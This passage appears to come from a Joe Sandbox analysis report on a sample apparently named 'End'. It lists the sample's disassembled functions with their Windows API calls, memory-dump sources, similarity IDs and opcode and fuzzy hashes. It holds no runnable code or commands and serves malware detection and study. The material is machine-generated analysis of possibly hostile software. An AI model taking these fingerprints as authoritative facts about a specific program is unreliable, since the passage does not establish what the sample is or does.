                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3183298772-0
                                                                                                                                                                                                                                  • Opcode ID: 236165637eae69758021049e933c44ccaea1c4c759e89068a902137a8dd5574c
                                                                                                                                                                                                                                  • Instruction ID: 2cd951744f08d436fc2bcf3fe0b3946a63648814a0d056e87cd9f4704776f27c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 236165637eae69758021049e933c44ccaea1c4c759e89068a902137a8dd5574c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E5146B25083499BC724EB94DC95AEB73DCAFC4350F00092EF685D31A1EF75A6888756
                                                                                                                                                                                                                                  Function 009F9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009F9534
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 009F95A5
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 009F9604
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009F9677
                                                                                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009F96A2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4136290138-0
                                                                                                                                                                                                                                  • Opcode ID: afc1d2a168020d6e34b064145093dd2d04dddf4e43ac90519f751459e1f7daaa
                                                                                                                                                                                                                                  • Instruction ID: e4414d6a1af7cdce77f9eeab94a83d2b46907895467d7fb18811bd328e475505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc1d2a168020d6e34b064145093dd2d04dddf4e43ac90519f751459e1f7daaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF5149B5A00619AFCB14DF68C884EAAB7F8FF89314B158569F915DB310E734E912CF90
                                                                                                                                                                                                                                  Function 00A09540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A095F3
                                                                                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A0961F
                                                                                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A09677
                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A0969C
                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A096A4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2832842796-0
                                                                                                                                                                                                                                  • Opcode ID: 2d6720dc5a13695159a78ba9ebc5b6eec647865b43a94c59a38c64082100249b
                                                                                                                                                                                                                                  • Instruction ID: 444f72a69c309f6c5318cfbe84b989298554efa2df92a3e08adb34bcd94ee288
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d6720dc5a13695159a78ba9ebc5b6eec647865b43a94c59a38c64082100249b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C514D35A00219DFDF15DF59C895AAABBF5FF89314F048058E849AB3A2CB35ED41CB90
                                                                                                                                                                                                                                  Function 00A19941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A1999D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00A19A2D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A19A49
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00A19A8F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00A19AAF
                                                                                                                                                                                                                                    • Part of subcall function 009AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A01A02,?,753CE610), ref: 009AF9F1
                                                                                                                                                                                                                                    • Part of subcall function 009AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009F0354,00000000,00000000,?,?,00A01A02,?,753CE610,?,009F0354), ref: 009AFA18
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 666041331-0
                                                                                                                                                                                                                                  • Opcode ID: 882098584cffeac842718c590fa3665ebabe0fc9b1796024ae80fd43a5e26e5a
                                                                                                                                                                                                                                  • Instruction ID: bf787da32342710d8ba4f7b5f1f4be7bcfd51aec6bdd63f5f01943940e10bdff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 882098584cffeac842718c590fa3665ebabe0fc9b1796024ae80fd43a5e26e5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86515835604205DFDB10DF68C4949EABBF0FF49354B1881A8E80AAB762D731ED86CB81
                                                                                                                                                                                                                                  Function 00A275AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A2766B
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00A27682
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A276AB
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A0B5BE,00000000,00000000), ref: 00A276D0
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A276FF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3688381893-0
                                                                                                                                                                                                                                  • Opcode ID: 51bc0dd24835f7bbea869cb1b5592422cf2e16d11d911a2eb26cb2a25bb695fb
                                                                                                                                                                                                                                  • Instruction ID: 3c7c2a9b3b9a62607d088d8161557d7f8529738491ebd394d222ff2d44abb2d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51bc0dd24835f7bbea869cb1b5592422cf2e16d11d911a2eb26cb2a25bb695fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E41E035A08524AFC725CF6CEC48FAA7BA5EB49350F150234F819A72E1D770AE12CA50
                                                                                                                                                                                                                                  Function 009C23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 4fda94e04ab073d1fa25909dea2ccf479b720c1d84ca132191621d24c66cb105
                                                                                                                                                                                                                                  • Instruction ID: 3690dca9d780e41fc72dce86c27365fa55a27750c7c1a9f67197c5283502fd67
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fda94e04ab073d1fa25909dea2ccf479b720c1d84ca132191621d24c66cb105
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69419F32E002009BDB24DFB8C981F5AB7B5EF89714B15456DE516EB291D631AD028B81
                                                                                                                                                                                                                                  Function 009919CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 009919E1
                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 009919FE
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00991A23
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00991A3D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                                                                                                  • Opcode ID: c6bc01894b6b5647d4d20c03ba78929e78d90b34823fd3290d13086f2229ce6d
                                                                                                                                                                                                                                  • Instruction ID: 1d40d0993988ce09d852f1d1a4e617e76c80ab93191eea01a4f048e67ce6ec64
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6bc01894b6b5647d4d20c03ba78929e78d90b34823fd3290d13086f2229ce6d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C413C71A0921BAFDF15DFA8C844BFEB775FB05325F20822AE429A2290C7346E55CB51
                                                                                                                                                                                                                                  Function 00A042B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 00A04310
                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A04367
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00A04390
                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00A0439A
                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A043AB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2256411358-0
                                                                                                                                                                                                                                  • Opcode ID: 7c3b0752dd25a57b7db2a3f33f43042a9a019e6c24c92e6e80a622bcf6ec3312
                                                                                                                                                                                                                                  • Instruction ID: e8418bd7439e0e62c16bcbdd63173197011e30c386de261205afddb7b77e79be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c3b0752dd25a57b7db2a3f33f43042a9a019e6c24c92e6e80a622bcf6ec3312
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD31B7B0504749DFEB38CBB4F848BB63BB8BB09304F041569D662CA1E0E7B59446CB22
                                                                                                                                                                                                                                  Function 009F224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009F2262
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 009F230E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 009F2316
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 009F2327
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009F232F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                                                                                                  • Opcode ID: 3b5c26347cacb2c698836752d6b4a5c1415fc6487f8c3af9c14299f141d48808
                                                                                                                                                                                                                                  • Instruction ID: 92efc96fd764f6cb1b2066a01d1a0b25e61c47cee81c5357e11b827a766eb098
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5c26347cacb2c698836752d6b4a5c1415fc6487f8c3af9c14299f141d48808
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31B17190021DEFDB14CFA8CD89BEE3BB5EB04315F104225FA25AB2D1C7749955DB90
                                                                                                                                                                                                                                  Function 00A261A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A261E4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A2623C
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2624E
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A26259
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A262B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 763830540-0
                                                                                                                                                                                                                                  • Opcode ID: d18a87b08027a3dbfbc7835eeb9c9d9f4ab2eb2abd0ed08f8bdaf9069dcea29f
                                                                                                                                                                                                                                  • Instruction ID: 2e3620ee3ebd32c35be7c45a0ae66b456530ba440b659ea098cc39d8ec0d4fe5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d18a87b08027a3dbfbc7835eeb9c9d9f4ab2eb2abd0ed08f8bdaf9069dcea29f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21A571D01268AADB20DFA8DD84AEE7BB8FF44720F104226F925EB181D7709985CF50
                                                                                                                                                                                                                                  Function 00A1138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00A113AE
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A113C5
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00A11401
                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00A1140D
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00A11445
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                                                                                                  • Opcode ID: 9ff694b53b3eba26b8164ef42f640ca4f2a3de6eb7cc34de58ac196d066e03e2
                                                                                                                                                                                                                                  • Instruction ID: f0ca515f53713c950f941b644a39d31720a86da94014226d5d9fd9b9071dac12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff694b53b3eba26b8164ef42f640ca4f2a3de6eb7cc34de58ac196d066e03e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18219635600204AFD714DF69DC84AAEB7F5EF44340B048439F85AD7751CA30EC45DB90
                                                                                                                                                                                                                                  Function 009CD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009CD146
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009CD169
                                                                                                                                                                                                                                    • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009CD18F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CD1A2
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009CD1B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 764ff24227d8e5274e1a17d929d7222bc8271bf9818d71aff4050d88fd54dbfe
                                                                                                                                                                                                                                  • Instruction ID: 9d84c00d09571cf15b5f199260e1f274cd73a1bda6b2c981ef2c42a1f9360fd8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 764ff24227d8e5274e1a17d929d7222bc8271bf9818d71aff4050d88fd54dbfe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31018876E0A6157F332566BA9C8CF7F6A6DDEC6B61318013DFD05C6145DA608D0282B2
                                                                                                                                                                                                                                  Function 009F6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
